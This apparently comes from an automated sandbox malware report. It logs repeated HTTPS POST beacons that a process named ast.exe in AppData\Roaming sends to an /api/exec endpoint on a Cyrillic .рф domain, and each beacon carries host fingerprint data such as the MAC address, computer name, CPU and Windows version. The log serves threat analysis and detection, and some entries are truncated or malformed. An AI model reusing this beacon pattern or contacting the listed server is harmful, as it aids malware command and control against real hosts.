2024-11-19 17:57:09 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49986 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:11 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:11 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49989 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:12 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:12 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49995 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:14 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:14 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49998 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:15 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:15 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 50001 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:16 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:16 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 50004 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:17 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:17 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 50007 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:18 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:18 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 50010 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:19 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:19 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 50013 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:19 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:19 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 50016 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:20 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:20 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 50019 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:21 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:21 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 50022 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:22 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:22 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 50025 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:23 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:23 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 50028 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:24 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:24 UTC | 269 | OUT |
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 50031 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:25 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 50040 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:28 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.
2024-11-19 17:57:28 UTC | 403 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 50043 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:29 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 50046 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:30 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 50049 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:31 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 50052 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:32 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 50055 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:33 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 50064 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:36 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 50070 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:38 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 50073 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:39 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 50076 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:40 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 50079 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:41 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 50082 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:42 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                                          2024-11-19 17:57:42 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 50085 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:43 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:43 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 50088 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:44 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:44 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 50091 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:45 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:45 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 50094 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:45 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:45 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50097 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:46 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:46 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50100 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
